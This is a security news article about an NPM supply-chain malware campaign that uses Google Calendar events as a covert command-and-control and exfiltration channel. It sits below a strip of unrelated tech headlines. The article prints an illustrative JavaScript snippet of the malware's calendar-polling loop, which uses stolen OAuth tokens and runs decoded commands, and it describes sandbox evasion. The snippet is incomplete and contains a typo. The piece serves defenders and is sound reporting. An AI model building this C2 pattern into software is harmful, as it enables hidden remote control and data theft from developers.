![Apple Pay, Apple Card, Wallet and Apple Cash Currently Experiencing Service Issues [Update: Fixed]](https://images.macrumors.com/t/RQPLZ_3_iMyj3evjsWnMLVwPdyA=/1600x/article-new/2023/11/apple-pay-feature-dynamic-island.jpg)
![iPhone 17 Air Could Get a Boost From TDK's New Silicon Battery Tech [Report]](https://www.iclarified.com/images/news/97344/97344/97344-640.jpg)
![Vision Pro Owners Say They Regret $3,500 Purchase [WSJ]](https://www.iclarified.com/images/news/97347/97347/97347-640.jpg)
![Apple Showcases 'Magnifier on Mac' and 'Music Haptics' Accessibility Features [Video]](https://www.iclarified.com/images/news/97343/97343/97343-640.jpg)
![Sony WH-1000XM6 Unveiled With Smarter Noise Canceling and Studio-Tuned Sound [Video]](https://www.iclarified.com/images/news/97341/97341/97341-640.jpg)
![How to upgrade the M4 Mac mini SSD and save hundreds [Video]](https://i0.wp.com/9to5mac.com/wp-content/uploads/sites/6/2025/05/M4-Mac-mini-SSD-Upgrade-Tutorial-2TB.jpg?resize=1200%2C628&quality=82&strip=all&ssl=1)
![[The AI Show Episode 147]: OpenAI Abandons For-Profit Plan, AI College Cheating Epidemic, Apple Says AI Will Replace Search Engines & HubSpot’s AI-First Scorecard](https://www.marketingaiinstitute.com/hubfs/ep%20147%20cover.png)
![How to Enable Remote Access on Windows 10 [Allow RDP]](https://bigdataanalyticsnews.com/wp-content/uploads/2025/05/remote-access-windows.jpg)
![[FREE EBOOKS] Modern Generative AI with ChatGPT and OpenAI Models, Offensive Security Using Python & Four More Best Selling Titles](https://www.javacodegeeks.com/wp-content/uploads/2012/12/jcg-logo.jpg){kind=logo}
![How to make Developer Friends When You Don't Live in Silicon Valley, with Iraqi Engineer Code;Life [Podcast #172]](https://cdn.hashnode.com/res/hashnode/image/upload/v1747360508340/f07040cd-3eeb-443c-b4fb-370f6a4a14da.png?#)
-Marathon-Gameplay-Overview-Trailer-00-04-50.png?width=1920&height=1920&fit=bounds&quality=70&format=jpg&auto=webp#)
Sophisticated NPM Attack Exploits Google Calendar C2 For Sophisticated Communication
A new advanced supply chain attack targeting the Node Package Manager (NPM) ecosystem has emerged, leveraging Google Calendar as a covert command and control (C2) channel. Cybersecurity experts discovered the malware embedded in seemingly legitimate JavaScript libraries that, once installed, establish a stealthy communication pathway with attackers through common Google services. The malware has potentially […] The post Sophisticated NPM Attack Exploits Google Calendar C2 For Sophisticated Communication appeared first on Cyber Security News.
A new advanced supply chain attack targeting the Node Package Manager (NPM) ecosystem has emerged, leveraging Google Calendar as a covert command and control (C2) channel.
Cybersecurity experts discovered the malware embedded in seemingly legitimate JavaScript libraries that, once installed, establish a stealthy communication pathway with attackers through common Google services.
The malware has potentially compromised thousands of development environments since its first appearance approximately two weeks ago, with infected packages having been downloaded over 35,000 times before discovery.
The attack begins when developers unknowingly install compromised NPM packages that contain obfuscated payloads designed to evade standard security scans.
Upon installation, the malicious code executes with the same privileges as the user, establishing persistence and initiating its communication protocol.
Unlike conventional C2 infrastructures that rely on suspicious domains, this attack method abuses trusted Google services, making detection particularly challenging for security tools configured to flag unusual network destinations.
Veracode researchers identified the threat after observing anomalous API calls to Google Calendar during routine security monitoring of development environments.
“What makes this attack particularly concerning is its abuse of legitimate cloud services,” said Dr. Alex Chen, Principal Security Researcher at Veracode.
“By hiding in plain sight within Google Calendar events, the malware’s communications blend perfectly with normal business traffic.”
The malware exploits OAuth tokens to authenticate with Google’s API services, creating or modifying calendar events that contain encoded commands.
These seemingly innocent calendar entries serve as both the control mechanism and exfiltration channel, with attackers embedding commands in event descriptions, locations, and attendee fields.
The approach effectively bypasses many data loss prevention systems that typically whitelist Google services.
Further analysis reveals sophisticated anti-analysis techniques incorporated into the malware, including environment awareness checks that prevent execution in virtualized environments and debugging tools.
The malware also implements a delayed execution pattern to evade sandbox detection, only activating its payload after determining it resides in a legitimate development environment rather than an analysis system.
Calendar-Based Command & Control
The malware’s Google Calendar C2 mechanism represents an innovative approach to maintaining persistent control.
After establishing initial access, the malware creates a hidden background process that periodically queries the user’s Google Calendar using stolen OAuth credentials.
The following code snippet illustrates how the malware accesses the Calendar API:-
const {google} = require('googleapis');
const calendar = google.calendar({version: 'v3', auth: stolenOAuth});
async function checkForCommands() {
const res = await calendar.events.list({
calendarId: 'primary',
timeMin: new Date().toISOString(),
maxResults: 10,
singleEvents: true,
orderBy: 'startTime',
q: 'sync_status' // Specific marker used by attackers
});
const events = res.data.items;
if (events. Length) {
const commands = decodeCommands(events[0].description);
executeCommands(commands);
// Delete or modify event to acknowledge receipt
await calendar.events.delete({calendarId: 'primary', eventId: events[0].id});
}
}The malware parses event descriptions for base64-encoded commands hidden within seemingly legitimate text.
These commands enable attackers to execute arbitrary code, exfiltrate sensitive data, or download additional payloads.
For data exfiltration, the malware cleverly encodes stolen information as calendar event attachments or within meeting notes.
Organizations are advised to implement strict OAuth application monitoring, perform comprehensive dependency scanning of Node.js projects, and deploy advanced behavioral monitoring to detect anomalous calendar API usage.
Security teams should specifically look for calendar modifications occurring outside normal user activity patterns, particularly those with embedded encoded content.
How SOC Teams Save Time and Effort with ANY.RUN - Live webinar for SOC teams and managers
The post Sophisticated NPM Attack Exploits Google Calendar C2 For Sophisticated Communication appeared first on Cyber Security News.
